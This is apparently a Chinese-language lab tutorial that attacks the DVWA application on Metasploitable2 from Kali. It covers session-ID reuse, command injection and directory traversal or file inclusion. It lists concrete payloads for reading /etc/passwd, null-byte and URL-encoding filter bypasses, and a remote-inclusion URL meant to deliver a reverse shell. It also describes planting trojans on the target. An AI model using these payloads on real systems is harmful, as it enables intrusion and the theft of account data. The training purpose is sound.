这里介绍一些手动挖掘漏洞时比较容易找到的漏洞，根据不同类型的漏洞来介绍。

演示准备

目标主机：Metasploitable2

攻击目标：目标主机的dvwa系统

攻击机：Kali

SessionId盗用

不知道你们有没有遇到过一些钓鱼链接，我们公司前段时间就收到了好多钓鱼邮件，这些钓鱼邮件多数时候其实是为了获取你的sessionId，不法分子盗取了你特定的sessionId，就相当于获取了你在对应系统中的权限。

这里不对盗取sessionId的过程进行展开，方式有很多，比如钓鱼网站或者钓鱼邮件。在这里主要是演示一下sessionId的使用。

如果本地有sessionId的话，都是存在cookies里面的：

当你未登录时，会给你一个新的sessionId，就算你知道目标url地址，直接访问过去，也会被跳转到登录页或者访客页面。

但当你将这个sessionId改成你已经登录的sessionId，就可以不用登录，直接访问内部地址。

后端对于sessionId的管理机制，对于账户安全影响非常大。比如每个账户的sessionId是否每次都随机生成，每个sessionId的有效性机制等等。

一般现在的系统在logout的时候都会将sessionId失效，所以不要小看系统中的logout按钮。

Command Execution

Command Execution是漏洞类型的名称，翻译过来大概就是命令执行漏洞。当你所能浏览的页面中有一个命令执行框时，你就该尝试一些特殊字符了，比如：“：”、“|”、“>”等等。当你确认被渗透系统的命令输入框存在安全漏洞，可以执行手动传入的特定命令时，我们就可以通过这个入口获取shell，然后提权，然后安装后门等等。

这个执行框的功能目标是对指定ip进行ping连接，检查路由是否通畅。

Command Execution-low

当安全等级为low时，这样输入指令，就能执行我们传入的命令：

可以看一下这个命令执行款在后端对应的逻辑代码：

可以看到后端在接收到操作者输入的指令后，没有做任何检验判断，直接组装成了命令进行执行。

Command Execution-medium

当安全等级为medium时，我们还是能够执行指定的命令：

看一下这个安全等级后端的实现代码：

可以看到后端虽然对接受的命令做了一些校验判断，但是还是有些漏网之鱼可以绕过校验，比如“|”、“&”等等。

Command Execution-high

将安全等级调到high，基本找不到执行我们传入命令的方式：

看一下逻辑代码：

可以看到，代码中将传入的字符串通过“.”进行了拆分，然后对拆分后的每一个部分都进行了判断，只有判断成功后才会重新组装成ip，对这个组装后的ip进行ping操作。这样就杜绝了传入一些尾巴一起被执行的漏洞。

Directory traversal / File include

Directory traversal 和 File include 严格来说这是两个漏洞类型，但是多数时候他们的表现形式非常相似，都有可能导致信息泄漏。

Directory traversal 翻译后是目录权限限制不严的意思。比如你能从当前服务对应的目录访问到/etc/passwd文件，就会暴露一下账户信息。

File include 翻译后是文件包含。有些编程语言提供了include方法，可以直接调用到其他目录的文件，也许是本地目录，也可能是其他主机的目录。

演示前，将靶机的/etc/php5/cgi/php.ini文件里的配置改一下：

配置修改成功后，要将重启服务：

找这类漏洞的时候可以特别关注一下这类特征：?变量=文件名

这类漏洞不绝对带有明显特征，但是多数情况下都带有这类特征。

比较经典的攻击方式：

# 如果不清楚当前具体位置，就多加一些../就行，因为到根目录后返回上层还是根目录
?page=../../etc/passwd  
?page=file:///etc/passwd
# 从这里可以读取到一些源码，不能确定会造成多大危害
?home=main.cgi	
#  这里可以弄个反弹shell的可执行文件，把地址传给靶机，靶机执行后我们就可以获取靶机的shell
?page=http://www.a.com/1.php	

当后端做了一些校验判断，进行了字符过滤的时候，可以尝试在传参最后加这些特殊字符：

• “.”
• “%00”

比如这样传“?page=/etc/passwd%00.php”，在php的后端校验中，也许就绕过校验了。这些都是编程语言本身特性决定的，所以确认目标系统后端是用什么语言实现的，对于渗透工作也是很有帮助的。

让后端校验判断非常完善的时候，还可以试试将命令转码，例如：

url编码、双层url编码
%2e%2e%2f				 						 解码：../
%2e%2e%5c										解码：..\
%252e%252e%255c				解码：..\
Unicode/UTF-8编码
..%c0%af													解码：../
..%c1%9c												 解码：..\

也许就绕过后端的校验了。

网上也有同学整理过一些经验，当你无法直接访问到你指定的文件时，可以这样尝试：

# 在结尾处加一些英文句号
?page=/etc/passwd...
# 在结尾处加多个空格
?page=/etc/passwd<spaces>
# 在结尾处加引号
?page=/etc/passwd""""""
# 在结尾处加一些尖括号
?page=/etc/passwd<<>><<>
# 在同层级目录中跳转几次
?page=./././passwd
# 在不同层级目录之间跳转一次
?page=ppp/../passwd

这些方式往往会产生意想不到的效果。

kali作为专业渗透的集大成者，在里面也存放了这类漏洞的字典，可以参考使用：

Directory traversal / File include-low

看一下安全等级low的时候，利用这个漏洞：

如果这个漏洞是单纯的Directory traversal，直接传/etc/passwd是无法获取到信息的，需要其他传参才能获取到用户信息。

可以看一下这个安全等级下的逻辑代码：

对于入参没有做任何的校验判断。

Directory traversal / File include-medium

当安全等级medium的时候，利用这个漏洞：

看一下代码：

虽然做了校验，但是校验方式比较粗糙，没有起到很好的防护作用。而且看检验方式，好像能直接访问指定地址，在kali开一个监听：

将kali的地址作为参数传递，但是后端将“http://”替换成了“”，所以要在被替换字段里面加一个“http://”：

可以看到kali已经收到了请求：

虽然不能直接从靶机传一个shell过来，但是可以从kali传一些木马到靶机，然后想办法触发木马进一步控制靶机。

或者还可以这样，在kali的var/www/html中新建一个文件a.txt：

启动kali中的apache服务：

然后就可以将命令传递给靶机，得到执行结果了：

Directory traversal / File include-high

当安全等级high的时候，利用这个漏洞：

看一下代码：

校验的时候直接写死了，只能传include.php才能显示，不然就提示为找不到文件。真的这样写的话，其实都不需要传这个page参数，直接写死就行了。

最后提一下这种类型的漏洞不一定仅仅在url中，也可能在headers里面，所以做渗透测试的时候要多翻一翻，不要墨守成规。